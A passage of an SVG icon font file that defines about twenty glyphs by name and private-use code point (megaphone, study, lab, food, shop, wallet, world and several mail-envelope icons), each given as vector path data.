<glyph unicode="&#xe933;" glyph-name="megaphone2" d="M800 960c-65.696 0-117.312-45.12-154.368-114.752l-0.672 0.384c-53.824-105.376-133.952-173.632-221.728-173.632h-295.232c-71.776 0-128-70.304-128-160 0-89.76 56.224-160 128-160 35.296-0.128 63.84-28.672 63.84-64v-288c0-35.36 28.672-64 64-64h128c35.328 0 64 28.64 64 64v32c0 32-32 46.304-32 64v224c0 0.736 0.512 1.248 0.576 1.984 0.32 4.576 1.568 8.8 3.584 12.64 0.576 1.056 1.184 1.888 1.888 2.816 2.56 3.808 5.792 6.944 9.728 9.376 0.192 0.128 0.256 0.32 0.448 0.448 0.128 0 0.224 0.128 0.352 0.128 2.56 1.44 5.632 1.76 8.512 2.56 80.768-8.576 153.888-73.76 204.064-171.936l0.8 0.384c37.088-69.408 88.576-114.4 154.208-114.4 147.072 0 224 225.376 224 448s-76.928 448-224 448zM640 512c0 33.184 1.952 65.248 5.248 96h90.752c35.328 0 64-43.008 64-96 0-53.056-28.672-96-64-96h-90.752c-3.296 30.752-5.248 62.752-5.248 96zM64 512c0 52.992 28.672 96 64 96h224.448c-19.84-23.328-32.448-57.184-32.448-96 0-38.88 12.608-72.736 32.448-96h-224.448c-35.328 0-64 42.944-64 96zM383.84 0h-128v288c0 23.328-6.24 45.12-17.184 64h22.336v-0.384h96.256c-3.424-9.952-5.408-20.512-5.408-31.616v-224c0-30.816 17.216-51.328 27.488-63.552 1.408-1.696 3.072-3.424 4.512-5.312v-27.136zM423.232 415.616h-7.232v0.384c-35.328 0-64 42.944-64 96 0 52.992 28.672 96 64 96h7.232c60.352 0 116.864 23.744 166.592 64.576-9.152-51.52-13.824-106.080-13.824-160.576 0-54.688 4.672-109.44 13.888-160.992-49.76 40.864-106.304 64.608-166.656 64.608zM800 128c-64.576 0-120 91.872-145.312 224h81.312c71.744 0 128 70.24 128 160 0 89.696-56.256 160-128 160h-81.312c25.312 132.064 80.736 224 145.312 224 88.384 0 160-171.936 160-384s-71.616-384-160-384z" />
<glyph unicode="&#xe934;" glyph-name="study" d="M1024 704c0 44.992-30.624 83.456-74.432 93.568l-416.416 96.096c-6.976 1.568-14.080 2.336-21.152 2.336s-14.176-0.768-21.6-2.432l-415.968-96c-43.84-10.112-74.432-48.576-74.432-93.568s30.624-83.456 74.4-93.568l85.6-19.744v-270.688c0-84.928 97.216-160 352-160s352 75.072 352 160v270.688l85.568 19.744c43.808 10.112 74.432 48.576 74.432 93.568zM800 320c0-35.36-96-96-288-96s-288 60.64-288 96v255.904l266.816-61.568c6.976-1.568 14.112-2.336 21.184-2.336s14.208 0.768 21.568 2.432l266.432 61.472v-255.904zM519.2 576.8c-2.4-0.512-4.8-0.8-7.2-0.8s-4.832 0.288-7.2 0.8l-416 96c-14.528 3.36-24.8 16.288-24.8 31.2s10.272 27.84 24.8 31.2l416 96c2.368 0.512 4.768 0.8 7.2 0.8s4.832-0.288 7.2-0.8l416-96c14.496-3.36 24.8-16.288 24.8-31.2s-10.304-27.84-24.8-31.2l-416-96zM928 544c0 17.696 14.304 32 32 32 17.664 0 32-14.304 32-32v-288c0-17.696-14.336-32-32-32-17.696 0-32 14.304-32 32v288zM960 192c35.328 0 64-92.672 64-128s-28.672-64-64-64c-35.36 0-64 28.672-64 64s28.64 128 64 128z" />
<glyph unicode="&#xe935;" glyph-name="lab2" d="M661.824 840.576c-15.136 15.104-35.2 23.424-56.576 23.424s-41.44-8.32-56.64-23.456l-45.12-45.184c-15.136-15.104-23.488-35.2-23.488-56.608 0-15.072 4.128-29.504 11.872-42.016l-434.464-174.048c-29.056-12.768-49.888-38.976-55.744-70.048-5.92-31.264 4-63.328 26.688-85.984l407.040-402.56c17.536-17.536 40.832-27.488 65.44-28.064 0.576-0.032 1.92-0.032 2.496-0.032 6.464 0 13.024 0.672 19.52 1.984 31.808 6.592 57.856 28.576 69.664 58.496l170.944 428.032c12.864-8.48 28-13.024 43.744-13.024 21.44 0 41.504 8.352 56.576 23.456l45.024 45.056c15.264 15.168 23.616 35.296 23.616 56.736s-8.384 41.6-23.424 56.576l-247.168 247.264zM533.088 20.256c-3.968-10.016-12.704-17.408-23.264-19.584-2.432-0.512-4.896-0.704-7.328-0.672-8.128 0.192-15.968 3.456-21.824 9.344l-407.296 402.816c-7.488 7.456-10.784 18.144-8.8 28.576 1.952 10.368 8.928 19.136 18.624 23.36l198.944 79.68c134.048-44.576 268.128-1.632 402.24-144.704l-151.296-378.816zM863.744 525.44l-45.248-45.216c-6.24-6.272-16.384-6.272-22.624 0l-56.576 56.544-45.824-114.848 3.808 9.696c-96.32 96.16-194.208 108.288-282.528 119.136-28.384 3.488-55.904 7.136-82.944 12.96l271.712 108.832-54.88 54.88c-6.24 6.24-6.24 16.384 0 22.624l45.248 45.28c6.24 6.24 16.384 6.24 22.624 0l247.2-247.264c6.336-6.24 6.336-16.384 0.032-22.624zM528 288c44.096 0 80 35.872 80 80s-35.872 80-80 80c-44.128 0-80-35.872-80-80s35.904-80 80-80zM528 416c26.496 0 48-21.504 48-48s-21.504-48-48-48c-26.528 0-48 21.504-48 48s21.472 48 48 48zM944 960c-44.128 0-80-35.872-80-80s35.872-80 80-80 80 35.872 80 80-35.872 80-80 80zM944 832c-26.496 0-48 21.504-48 48s21.504 48 48 48 48-21.504 48-48-21.504-48-48-48zM256 416c0-35.296 28.704-64 64-64s64 28.704 64 64-28.704 64-64 64-64-28.704-64-64zM320 448c17.664 0 32-14.304 32-32s-14.336-32-32-32-32 14.304-32 32 14.336 32 32 32zM384 224c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32zM896 704c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32s-32 14.327-32 32z" />
<glyph unicode="&#xe936;" glyph-name="food" d="M944 288h-86.112c-1.44 7.648-3.2 15.136-5.12 22.592l153.568 76.768c15.808 7.904 22.176 27.136 14.304 42.944-7.936 15.808-27.072 22.144-42.944 14.304l-146.496-73.216c-55.872 120.576-177.76 204.608-319.2 204.608-172.224 0-315.68-124.416-345.888-288h-86.112c-44.096 0-80-35.872-80-80 0-15.68 5.76-30.816 16.16-42.528l111.84-125.824v-23.648c0-44.128 35.904-80 80-80h608c44.128 0 80 35.872 80 80v23.648l111.808 125.824c10.432 11.712 16.192 26.848 16.192 42.528 0 44.128-35.872 80-80 80zM825.568 288h-17.984l15.936 8c0.608-2.688 1.472-5.28 2.048-8zM512 544c128.928 0 240-76.8 290.624-186.912l-28.512-14.24c-45.312 99.68-145.472 169.152-262.112 169.152-137.024 0-251.488-95.776-280.64-224h-32.896c29.728 145.888 159.008 256 313.536 256zM658.432 288c-24.736 56.416-80.992 96-146.432 96s-121.664-39.584-146.432-96h-34.368c26.432 74.432 97.376 128 180.8 128 78.88 0 146.816-47.872 176.256-116.064l-29.824-11.936zM512 320c-28.256 0-53.44-12.512-71.040-32h-39.168c22.208 38.048 63.040 64 110.208 64 47.136 0 88-25.952 110.176-64h-39.2c-17.536 19.488-42.72 32-70.976 32zM512 448c-101.28 0-186.944-67.584-214.56-160h-33.024c28.544 110.208 128.544 192 247.584 192 103.872 0 193.376-62.336 233.44-151.488l-28.576-14.272c-34.816 78.624-113.504 133.76-204.864 133.76zM832 64v-48c0-8.832-7.2-16-16-16h-608c-8.832 0-16 7.168-16 16v48l-128 144c0 8.832 7.168 16 16 16h864c8.8 0 16-7.168 16-16l-128-144zM255.264 585.216c-0.224 0.448-0.384 0.864-0.576 1.344-16.608 40.096-0.096 79.424 14.816 114.912 14.112 33.664 26.624 63.488 13.696 92.576-0.064 0.128-0.096 0.256-0.16 0.384-0.032 0.096-0.064 0.192-0.096 0.288-0.032 0.064-0.032 0.128-0.032 0.192-0.64 1.696-1.024 3.488-1.024 5.408 0 8.64 7.008 15.68 15.68 15.68 6.656 0 12.32-4.16 14.592-10.016 17.856-40.672 1.632-80.672-13.504-116.704-14.016-33.344-25.408-64.32-13.408-92.544 0.064-0.224 0.064-0.416 0-0.64 0.352-1.28 0.576-2.624 0.576-4 0-8.864-7.2-16.096-16.064-16.096-6.208 0-11.52 3.52-14.176 8.64-0.032 0-0.064 0-0.064 0-0.096 0.192-0.16 0.384-0.256 0.576zM644.928 589.888c-0.192 0.416-0.352 0.864-0.512 1.28-16.608 40.096-0.128 79.456 14.752 114.944 14.144 33.664 26.624 63.488 13.696 92.576 0 0.128-0.064 0.256-0.128 0.384-0.064 0.096-0.064 0.192-0.128 0.288 0 0.064 0 0.128 0 0.192-0.608 1.696-1.056 3.488-1.056 5.408 0 8.64 7.040 15.68 15.68 15.68 6.688 0 12.32-4.128 14.624-10.016 17.856-40.672 1.632-80.672-13.504-116.704-14.016-33.344-25.376-64.32-13.44-92.544 0.128-0.224 0.128-0.416 0.064-0.64 0.32-1.28 0.576-2.624 0.576-4 0-8.864-7.264-16.096-16.128-16.096-6.176 0-11.488 3.552-14.176 8.672h-0.064c-0.064 0.192-0.128 0.384-0.256 0.576zM480.608 729.216c-0.224 0.448-0.384 0.864-0.608 1.312-16.64 40.096-0.128 79.456 14.784 114.944 14.112 33.664 26.624 63.488 13.696 92.576-0.032 0.128-0.096 0.256-0.128 0.384-0.032 0.096-0.064 0.192-0.096 0.288-0.032 0.064-0.032 0.128-0.032 0.192-0.64 1.696-1.024 3.488-1.024 5.408 0 8.64 7.040 15.68 15.68 15.68 6.688 0 12.32-4.16 14.624-10.048 17.856-40.672 1.632-80.672-13.504-116.704-14.016-33.344-25.408-64.32-13.408-92.544 0.064-0.224 0.064-0.416 0-0.64 0.352-1.28 0.576-2.624 0.576-4 0-8.864-7.2-16.096-16.064-16.096-6.176 0-11.488 3.552-14.176 8.672-0.032 0-0.064 0-0.064 0-0.096 0.192-0.16 0.384-0.256 0.576z" />
<glyph unicode="&#xe937;" glyph-name="t-shirt" d="M1000 753.984l-160 128c-11.36 9.088-25.504 14.016-40 14.016h-576c-14.528 0-28.64-4.928-40-14.016l-160-128c-20.928-16.768-29.184-44.8-20.704-70.24l64-192c6.304-18.912 21.088-33.824 39.968-40.288 6.72-2.304 13.76-3.456 20.736-3.456 11.136 0 22.176 2.912 32 8.576v-392.576c0-35.328 28.672-64 64-64h576c35.328 0 64 28.672 64 64v392.576c9.824-5.664 20.864-8.576 32-8.576 7.008 0 14.016 1.152 20.736 3.456 18.88 6.464 33.632 21.376 39.936 40.288l64 192c8.512 25.44 0.256 53.472-20.672 70.24zM632.128 832c-17.696-37.152-64.576-64-120.128-64s-102.464 26.848-120.128 64h240.256zM896 512l-96 64v-512h-576v512l-96-64-64 192 160 128h133.664c17.824-55.104 79.872-96 154.336-96 74.432 0 136.512 40.896 154.304 96h133.696l160-128-64-192z" />
<glyph unicode="&#xe938;" glyph-name="fire2" d="M704 672c-1.984-85.6-66.24-157.888-66.24-157.888 0 159.232-125.76 285.888-125.76 285.888s-1.696-94.784-65.376-190.336c-63.68 222.944-254.784 350.336-254.784 350.336 95.552-350.336-31.84-477.76-31.84-732.544 0-149.472 126.528-291.456 320-291.456 286.624 0 342.048 105.216 371.68 223.776 40.832 163.232-20.32 352.992-147.68 512.224zM789.632 175.328c-20.576-82.208-43.808-175.328-309.632-175.328-160.256 0-256 115.648-256 227.456 0 85.632 15.616 155.936 32.128 230.368 20.992 94.368 42.496 190.976 33.184 318.752 98.688-136.608 133.824-317.6 133.824-317.6s91.872 128.992 116.576 188.896c18.912-38.496 36.288-167.872 36.288-295.872 0 0 84.992 70.016 148.736 175.296 67.136-120.384 91.328-246.24 64.896-351.968zM717.824 422.56l5.952-33.12c13.312-74.176 5.856-161.856-18.944-223.424-2.496-6.24-8.512-10.016-14.816-10.016-2.016 0-4.064 0.384-6.016 1.152-8.192 3.296-12.192 12.608-8.864 20.8 18.688 46.368 26.56 111.648 21.568 171.296-32.128-35.904-72.608-73.312-159.104-114.4l-16.192-7.648-5.824 16.896c-11.584 33.6-23.264 67.552-28.32 114.88-17.312-27.296-33.12-51.616-59.68-87.776l-16.256-22.144-11.264 25.088c-27.552 61.6-48.544 109.696-65.184 152-15.392-49.44-26.88-106.624-26.88-222.112 0-8.832-7.2-16-16-16-8.864 0-16 7.168-16 16 0 150.688 20 208.736 41.12 270.208l16.64 48.32 15.328-43.2c16.48-46.432 38.176-97.6 68.864-166.784 20.224 28.576 33.792 50.080 50.176 76.032l48.576 76.096v-54.688c0-61.568 11.072-101.792 23.264-138.336 85.088 42.816 116.96 80.064 150.656 119.36l27.2 31.52z" />
<glyph unicode="&#xe939;" glyph-name="clip" d="M939.616 811.616c112.512-112.448 112.512-294.816 0-407.264l-350.944-350.976c-12.512-12.544-32.736-12.544-45.248 0-12.576 12.512-12.576 32.704 0 45.248l346.432 346.464c87.488 87.488 87.488 229.248-0.064 316.768-87.36 87.488-229.248 87.488-316.736 0l-462.304-456.864c-62.496-62.464-62.496-163.776 0-226.24 62.496-62.496 163.744-62.496 226.24 0l466.88 461.344c37.44 37.44 37.44 98.336 0 135.776-37.44 37.408-98.304 37.408-135.744 0l-351.008-351.008c-12.512-12.512-32.736-12.512-45.248 0-12.512 12.544-12.512 32.736 0 45.28l350.976 350.976c62.432 62.464 163.744 62.464 226.24 0 62.496-62.496 62.496-163.776 0-226.272l-466.88-461.376c-87.296-87.328-229.408-87.328-316.736 0s-87.328 229.472 0 316.8l466.88 461.344c112.448 112.512 294.816 112.512 407.264 0z" />
<glyph unicode="&#xe93a;" glyph-name="shop" d="M1004.8 601.6l-96 127.936c-3.744 5.024-8.192 9.376-12.8 13.536v152.928c0 35.328-28.672 64-64 64h-640c-35.36 0-64-28.672-64-64v-152.96c-4.608-4.128-9.056-8.448-12.8-13.44l-95.968-127.968c-12.416-16.512-19.232-36.96-19.232-57.632v-32c0-52.928 43.072-96 96-96v0-416c0-35.328 28.672-64 64-64h704c35.328 0 64 28.672 64 64v416c52.928 0 96 43.072 96 96v32c0 20.672-6.816 41.12-19.2 57.6zM832 896v-128h-640v128h640zM326.176 480h-134.048l128 224h70.048l-64-224zM423.488 704h72.512v-224h-136.512l64 224zM528 704h72.512l64-224h-136.512v224zM633.76 704h70.048l128-224h-134.048l-64 224zM64 512v32c0 6.944 2.24 13.664 6.4 19.2l96 128c6.048 8.064 15.52 12.8 25.6 12.8h91.264l-128-224h-59.264c-17.664 0-32 14.304-32 32zM640 0h-240v320h240v-320zM864 0h-192v320c0 17.696-14.368 32-32 32h-240c-17.664 0-32-14.304-32-32v-320h-208v416h704v-416zM960 512c0-17.696-14.304-32-32-32h-59.328l-128 224h91.328c10.048 0 19.552-4.736 25.568-12.8l96-128c4.192-5.536 6.432-12.256 6.432-19.2v-32z" />
<glyph unicode="&#xe93b;" glyph-name="calendar3" d="M938.688 864h-138.688v64c0 17.696-14.304 32-32 32s-32-14.304-32-32v-64h-192v64c0 17.696-14.336 32-32 32s-32-14.304-32-32v-64h-192v64c0 17.696-14.336 32-32 32s-32-14.304-32-32v-64h-138.656c-47.136 0-85.344-38.176-85.344-85.312v-757.344c0-47.136 38.208-85.344 85.344-85.344h853.344c47.136 0 85.312 38.208 85.312 85.344v757.344c0 47.136-38.176 85.312-85.312 85.312zM960 21.344c0-11.776-9.568-21.344-21.312-21.344h-853.344c-11.776 0-21.344 9.568-21.344 21.344v757.344c0 11.744 9.568 21.312 21.344 21.312h138.656v-64c0-17.696 14.336-32 32-32s32 14.304 32 32v64h192v-64c0-17.696 14.336-32 32-32s32 14.304 32 32v64h192v-64c0-17.696 14.304-32 32-32s32 14.304 32 32v64h138.688c11.744 0 21.312-9.568 21.312-21.312v-757.344zM224 576h128v-96h-128zM224 416h128v-96h-128zM224 256h128v-96h-128zM448 256h128v-96h-128zM448 416h128v-96h-128zM448 576h128v-96h-128zM672 256h128v-96h-128zM672 416h128v-96h-128zM672 576h128v-96h-128z" />
<glyph unicode="&#xe93c;" glyph-name="wallet2" d="M512 320c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64zM928.032 544c-0.032 0-0.032 0 0 0l-0.032 192v96c0 53.024-43.008 96-96 96h-656c-97.056 0-176-78.976-176-176v-640c0-97.024 78.944-176 176-176h576c97.024 0 176 78.976 176 176v48c0 0 0 0 0.032 0 127.936 96.032 127.936 287.968 0 384zM176 864h656c17.632 0 32-14.336 32-32v-197.888c-10.048 3.584-20.736 5.888-32 5.888h-0.032v160c0 17.696-14.336 32-32 32h-672c-17.664 0-32-14.304-32-32v-126.176c-19.744 20.192-31.968 47.712-31.968 78.176 0 61.856 50.112 112 112 112zM799.968 768h-672v32h672v-32zM799.968 736v-32h-672v32h672zM799.968 672v-32h-623.968c-17.28 0-33.408 4.224-48 11.2v20.8h671.968zM864 112c0-61.856-50.144-112-112-112h-576c-61.888 0-112 50.144-112 112v504.352c30.432-25.184 69.472-40.352 112-40.352h656c17.632 0 32-14.336 32-32v-64h-288c-88.384 0-160-71.616-160-160s71.648-160 160-160h288v-48zM904.864 224h-328.864c-52.928 0-96 43.072-96 96s43.072 96 96 96h288c19.744 0.256 39.328 9.824 51.264 25.728 3.328 4.48 5.92 9.504 8 14.752 0.288 0.704 0.8 1.248 1.056 1.984 23.008-30.176 35.68-67.168 35.68-106.464 0-49.216-19.872-94.88-55.136-128z" />
<glyph unicode="&#xe93d;" glyph-name="vynil" d="M702.432 923.2c-262.464 105.088-560.48-22.464-665.6-284.96-105.152-262.528 22.464-560.576 284.96-665.664 262.496-105.12 560.512 22.464 665.632 284.96 105.152 262.528-22.496 560.512-284.992 665.664zM345.6 31.968c-229.312 91.84-341.184 353.088-249.376 582.432 91.84 229.312 353.12 341.216 582.464 249.344 229.312-91.808 341.184-353.088 249.376-582.4-91.872-229.344-353.12-341.184-582.464-249.376zM535.968 507.296c-32.8 13.152-70.080-2.816-83.232-35.616s2.816-70.048 35.584-83.2c32.8-13.152 70.112 2.816 83.232 35.584 13.12 32.8-2.816 70.048-35.584 83.232zM500.224 418.144c-16.384 6.592-24.352 25.216-17.824 41.632 6.592 16.384 25.248 24.352 41.632 17.824 16.352-6.56 24.32-25.216 17.792-41.632-6.56-16.384-25.216-24.352-41.6-17.824zM583.488 626.080c-98.432 39.424-210.176-8.448-249.6-106.848-39.424-98.432 8.448-210.176 106.848-249.6 98.432-39.424 210.176 8.416 249.6 106.848s-8.384 210.208-106.848 249.6zM464.576 329.056c-65.536 26.208-97.472 100.896-71.264 166.4 26.24 65.504 100.864 97.472 166.368 71.264 65.568-26.24 97.504-100.928 71.328-166.432-26.272-65.504-100.928-97.504-166.432-71.232zM749.824 352.704h-0.064c-26.144-65.248-76.256-113.792-136.192-139.712-0.224-0.096-0.352-0.352-0.672-0.48-8.128-3.456-17.504 0.288-20.992 8.448-3.488 8.096 0.32 17.504 8.384 20.96 52.672 22.56 96.8 65.216 119.808 122.688v-0.032c3.296 8.224 12.608 12.224 20.8 8.896 8.192-3.264 12.192-12.576 8.928-20.768zM859.68 325.952c8.192-3.296 12.192-12.608 8.928-20.8-39.2-97.856-114.432-170.72-204.32-209.536-0.384-0.16-0.672-0.512-1.056-0.704-8.128-3.456-17.504 0.256-20.992 8.416-3.488 8.128 0.32 17.536 8.384 20.992 82.816 35.456 152.128 102.496 188.256 192.736 3.296 8.192 12.608 12.192 20.8 8.896zM800.256 349.728c8.192-3.296 12.192-12.608 8.928-20.8-32.672-81.568-95.36-142.24-170.24-174.592-0.352-0.192-0.544-0.48-0.864-0.64-8.128-3.456-17.504 0.288-20.992 8.416s0.32 17.536 8.448 21.024h-0.064c67.808 29.024 124.48 83.84 153.984 157.696 3.296 8.224 12.608 12.192 20.8 8.896zM432.416 674.816c3.488-8.16-0.288-17.536-8.416-21.056-52.672-22.528-96.8-65.216-119.776-122.624h-0.032c-3.264-8.192-12.576-12.192-20.8-8.896-8.192 3.296-12.192 12.576-8.896 20.8h0.032c26.112 65.216 76.256 113.792 136.192 139.712 0.224 0.096 0.384 0.352 0.672 0.448 8.128 3.488 17.536-0.224 21.024-8.384zM382.016 792.48c3.488-8.128-0.288-17.504-8.384-21.024-82.816-35.456-152.096-102.496-188.256-192.704-3.296-8.224-12.608-12.192-20.8-8.896-8.224 3.264-12.224 12.576-8.896 20.832 39.2 97.856 114.4 170.688 204.32 209.536 0.32 0.16 0.608 0.512 0.992 0.672 8.128 3.456 17.536-0.288 21.024-8.416zM398.784 712.672v-0.096c-67.744-28.992-124.448-83.84-153.984-157.696-3.296-8.224-12.608-12.16-20.8-8.896-8.16 3.328-12.192 12.608-8.864 20.832 32.64 81.536 95.328 142.272 170.24 174.656 0.32 0.128 0.512 0.448 0.832 0.576 8.128 3.488 17.536-0.288 21.024-8.384 3.488-8.16-0.32-17.536-8.416-20.992z" />
<glyph unicode="&#xe93e;" glyph-name="truck2" d="M794.624 593.76c-5.952 8.896-15.936 14.24-26.624 14.24h-32c-17.696 0-32-14.304-32-32v-192c0-17.696 14.304-32 32-32h128c17.696 0 32 14.304 32 32v48c0 6.304-1.888 12.512-5.376 17.76l-96 144zM864 384h-128v192h32l96-144v-48zM1007.872 469.248l-128 192c-17.856 26.784-47.744 42.752-79.872 42.752h-128v64c0 52.928-43.072 96-96 96h-480c-52.928 0-96-43.072-96-96v-352c0-52.928 43.072-96 96-96v0-96c0-52.928 43.072-96 96-96h36.544c14.304-55.072 64-96 123.488-96 59.424 0 109.12 40.928 123.424 96h169.024c14.304-55.072 64-96 123.488-96 59.424 0 109.12 40.928 123.424 96h36.608c52.928 0 96 43.072 96 96v192c0 19.008-5.568 37.44-16.128 53.248zM96 384c-17.664 0-32 14.304-32 32v352c0 17.696 14.336 32 32 32h480c17.696 0 32-14.304 32-32v-352c0-17.696-14.304-32-32-32h-480zM352.032 96c-35.36 0-64 28.672-64 64s28.64 64 64 64c35.328 0 64-28.672 64-64s-28.704-64-64-64zM768 96c-35.36 0-64 28.672-64 64s28.64 64 64 64c35.328 0 64-28.672 64-64s-28.672-64-64-64zM960 224c0-17.696-14.304-32-32-32h-36.576c-14.304 55.072-64 96-123.424 96-59.488 0-109.184-40.928-123.488-96h-169.024c-14.304 55.072-64 96-123.424 96-59.488 0-109.184-40.928-123.488-96h-36.576c-17.664 0-32 14.304-32 32v96h416c52.928 0 96 43.072 96 96v224h128c10.688 0 20.672-5.344 26.624-14.24l128-192c3.488-5.248 5.376-11.456 5.376-17.76v-192z" />
<glyph unicode="&#xe93f;" glyph-name="world" d="M496 960c-273.952 0-496-222.048-496-496s222.048-496 496-496 496 222.048 496 496-222.048 496-496 496zM927.2 480h-191.872c-1.76 70.88-14.368 138.592-36.736 200.576 43.2 18.016 83.136 41.984 119.552 70.304 64.736-72.672 105.216-167.040 109.056-270.88zM478.304 32.896c-53.184 44.288-97.792 101.792-130.432 168.576 41.888 13.088 86.272 20.256 132.128 21.728v-190.368c-0.576 0-1.12 0.032-1.696 0.064zM513.632 895.104c60.352-50.24 109.6-117.536 142.912-196.032-45.632-15.584-94.112-24.64-144.576-26.24v222.368c0.608-0.032 1.12-0.064 1.664-0.096zM566.944 889.664c88.32-14.688 167.552-55.936 229.248-115.648-33.504-25.696-70.112-47.456-109.696-63.936-29.12 69.024-69.984 130.048-119.552 179.584zM480 895.2v-222.368c-50.464 1.632-98.976 10.656-144.576 26.24 33.312 78.496 82.56 145.792 142.912 196.032 0.576 0.032 1.088 0.064 1.664 0.096zM305.472 710.048c-39.52 16.48-76.16 38.24-109.664 63.936 61.664 59.712 140.928 100.96 229.248 115.648-49.6-49.504-90.432-110.528-119.584-179.584zM323.36 669.568c49.344-17.12 101.92-27.104 156.64-28.768v-160.8h-191.328c1.728 67.008 13.6 131.040 34.688 189.568zM480 448v-192.8c-50.464-1.536-99.264-9.792-145.248-24.608-27.712 65.984-44.064 139.488-46.080 217.408h191.328zM425.056 38.336c-79.136 13.152-151.008 47.616-209.44 97.664 31.52 21.856 65.6 40.352 102.016 54.4 27.904-57.856 64.416-109.216 107.424-152.064zM512 32.8v190.368c45.824-1.472 90.24-8.64 132.128-21.728-32.672-66.784-77.248-124.288-130.432-168.576-0.544 0-1.12-0.032-1.696-0.064zM674.368 190.4c36.384-14.048 70.432-32.576 102.016-54.4-58.432-50.016-130.304-84.512-209.44-97.664 43.008 42.848 79.488 94.208 107.424 152.064zM657.248 230.592c-46.016 14.816-94.816 23.072-145.248 24.608v192.8h191.328c-2.016-77.92-18.4-151.424-46.080-217.408zM512 480v160.8c54.688 1.664 107.264 11.616 156.64 28.736 21.056-58.528 32.928-122.56 34.688-189.568h-191.328zM173.888 750.88c36.416-28.32 76.352-52.288 119.52-70.304-22.368-61.984-34.976-129.696-36.736-200.576h-191.872c3.84 103.84 44.32 198.208 109.088 270.88zM64.8 448h191.872c1.984-81.76 19.072-158.976 48.096-228.384-40.544-15.808-78.336-36.864-113.216-61.792-75.136 74.784-122.56 177.024-126.752 290.176zM800.448 157.856c-34.88 24.896-72.672 45.984-113.248 61.792 29.056 69.408 46.112 146.624 48.128 228.384h191.872c-4.192-113.184-51.648-215.424-126.752-290.176z" />
<glyph unicode="&#xe940;" glyph-name="mail-envelope" d="M192.115 704h671.77c35.643 0 64.115-28.569 64.115-63.81v-384.38c0-35.185-28.705-63.81-64.115-63.81h-671.77c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81zM192.098 672c-17.727 0-32.098-14.398-32.098-32.219v-383.562c0-17.794 14.045-32.219 32.098-32.219h671.803c17.727 0 32.098 14.398 32.098 32.219v383.562c0 17.794-14.045 32.219-32.098 32.219h-671.803zM736 608h96v-96h-96v96zM768 576v-32h32v32h-32zM224 384v-32h256v32h-256zM224 608v-32h128v32h-128zM224 320v-32h256v32h-256z" />
<glyph unicode="&#xe941;" glyph-name="mail-envelope2" d="M192.115 704h671.77c35.643 0 64.115-28.569 64.115-63.81v-384.38c0-35.185-28.705-63.81-64.115-63.81h-671.77c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81zM224 608v-32h128v32h-128zM736 608v-96h96v96h-96zM768 576v-32h32v32h-32zM224 384v-32h256v32h-256zM224 320v-32h256v32h-256z" />
<glyph unicode="&#xe942;" glyph-name="mail-envelope-open" d="M660.421 320h-266.608l71.819-63.37 72.55-0.347-54.294-0.283h108.112l0.638 0.567-3.18-0.017 70.963 63.449zM696.21 352l103.79 92.801v258.923c0 17.826-14.551 32.276-31.999 32.276h-480.003c-17.672 0-31.999-14.2-31.999-32.066v-262.334l101.546-89.6h338.664zM418.909 768l109.091 96 109.091-96h130.992c35.408 0 63.918-28.648 63.918-63.988v-107.532l96-84.48v-448.19c0-35.185-28.705-63.81-64.115-63.81h-671.77c-35.643 0-64.115 28.569-64.115 63.81v448.19l96 84.48v107.532c0 35.59 28.617 63.988 63.918 63.988h130.992zM589.691 768l-61.691 54.4-61.691-54.4h123.381zM832 554.327v-84.994l48 42.667-48 42.327zM224 469.333v84.994l-48-42.327 48-42.667zM432 224l-224-192h640l-224 192h-192zM885.924 40.795v0 0c6.203 5.866 10.076 14.145 10.076 23.204v416.001l-256-224.547 245.924-214.659zM170.076 40.795l245.924 214.659-256 224.547v-416.001c0-9.060 3.872-17.338 10.076-23.204v0 0zM320 640v-32h416v32h-416zM320 544v-32h416v32h-416zM320 448v-32h416v32h-416z" />
<glyph unicode="&#xe943;" glyph-name="mail-envelope-open2" d="M361.381 352l-105.381 89.6v262.334c0 17.867 14.326 32.066 31.999 32.066h480.003c17.448 0 31.999-14.357 31.999-32.066v-262.334l-106.659-89.6h-331.96zM399.017 320l57.054-48.51h141.432l57.746 48.51h-256.231zM709.925 315.936l-69.925-59.936 189.538-162.462-25.846-25.846-191.866 164.457-167.149-0.729-0.677 0.58-191.692-164.308-25.846 25.846 189.538 162.462-69.925 59.936-122.075 103.263v177.281l-96-84.48v-448.19c0-35.241 28.472-63.81 64.115-63.81h671.77c35.41 0 64.115 28.624 64.115 63.81v448.19l-96 84.48v-177.281l-122.075-103.263zM637.091 768l-109.091 96-109.091-96h218.182zM320 640v-32h416v32h-416zM320 544v-32h416v32h-416zM320 448v-32h416v32h-416z" />
<glyph unicode="&#xe944;" glyph-name="mail-envelope-closed" d="M170.080 663.235l357.92-311.235 357.981 311.287c6.206-5.878 10.019-14.235 10.019-23.507v-383.562c0-17.821-14.371-32.219-32.098-32.219h-671.803c-18.053 0-32.098 14.425-32.098 32.219v383.562c0 9.253 3.874 17.582 10.080 23.454zM192.115 704c-35.41 0-64.115-28.624-64.115-63.81v-384.38c0-35.241 28.472-63.81 64.115-63.81h671.77c35.41 0 64.115 28.624 64.115 63.81v384.38c0 35.241-28.472 63.81-64.115 63.81h-671.77zM528 393.6l-320 278.4h640l-320-278.4z" />
<glyph unicode="&#xe945;" glyph-name="mail-envelope-closed2" d="M226.462 610.462l25.846 25.846 275.692-236.308 275.692 236.308 25.846-25.846-301.538-258.462-301.538 258.462zM192.115 704c-35.41 0-64.115-28.624-64.115-63.81v-384.38c0-35.241 28.472-63.81 64.115-63.81h671.77c35.41 0 64.115 28.624 64.115 63.81v384.38c0 35.241-28.472 63.81-64.115 63.81h-671.77z" />
<glyph unicode="&#xe946;" glyph-name="mail-envelope-open3" d="M528 822.4l-352-310.4 352-304 352 304-352 310.4zM896 483.84l-368-323.84-368 323.84v-419.947c0-17.614 14.045-31.893 32.098-31.893h671.803c17.727 0 32.098 14.395 32.098 31.893v419.947zM928 63.81c0-35.185-28.705-63.81-64.115-63.81h-671.77c-35.643 0-64.115 28.569-64.115 63.81v448.19l400 352 400-352v-448.19z" />
